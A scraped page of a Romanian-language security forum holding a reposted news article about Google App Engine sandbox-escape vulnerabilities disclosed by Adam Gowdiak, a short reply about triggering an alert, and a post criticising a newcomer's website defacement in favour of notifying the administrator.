  23. Vulnerabilities in the Google App Engine cloud platform make it possible for attackers to break out of a first-level security sandbox and execute malicious code in restricted areas of Google servers, a security researcher said Friday. Adam Gowdiak, CEO of Poland-based Security Explorations, said there are seven separate vulnerabilities in the Google service, most of which he privately reported to Google three weeks ago. So far, he said, the flaws have gone unfixed, and he has yet to receive confirmation from Google officials. To exploit the flaws, attackers could use the freely available cloud platform to run a malicious Java application. That malicious Java app would then break out of the first sandboxing layer and execute code in the highly restricted native environment. Malicious hackers could use the restricted environment as a beachhead to attack lower-level assets and to retrieve sensitive information from Google servers and from the Java runtime environment. Technical details about the bugs, noted as issues 35 through 41, are available here, here, here, and here. In an e-mail to Ars, Gowdiak wrote: Gowdiak took to the Full Disclosure e-mail list to disclose the bugs and to call Google out for not responding to his private advisory, which he said included proof-of-concept exploit code. "It's been 3 weeks and we haven't heard any official confirmation / denial from Google with respect to Issues 37-41," Gowdiak wrote. "It should not take more than 1-2 business days for a major software vendor to run the received POC, read our report and / or consult the source code. This especially concerns the vendor that claims its 'Security Team has hundreds of security engineers from all over the world' and that expects other vendors to react promptly to the reports of its own security people." Google has received criticism in the past when its Project Zero has disclosed vulnerabilities in Windows and Mac OS X before Microsoft and Apple had patched them. Asked for comment on Gowdiak's Full Disclosure post, a Google spokesman issued the following statement: "A researcher recently reported a known issue affecting a preliminary layer of security in Google App Engine. We’re working with him to mitigate it; users don’t need to take any action." Source
  24. Bai a fost greu de tot de executat dar pana la urma a sarit alertu. ( noroc ca am fost 2 si a mers treaba mai repede ) Off// bag ... ca nu am stat sa fac ss. x2:// bine ca ai facut ss
  25. ON:// Salut si bun venit. ( ar fi ok sa iti modifici prezentarea si sa stergi fazele cu "am distrus , am baze de date etc..,, ) OFF:// Te-ai simtit chiar asa bine cand ai dat "Deface"? Nu era mai usor sa urci un fisier .txt si gata? gen: site-ul.meu.com/deface.txt si sa anunti administratorul si chiar sa-l ajuti sa repare? Toti sunteti pe stricat?
×
×
  • Create New...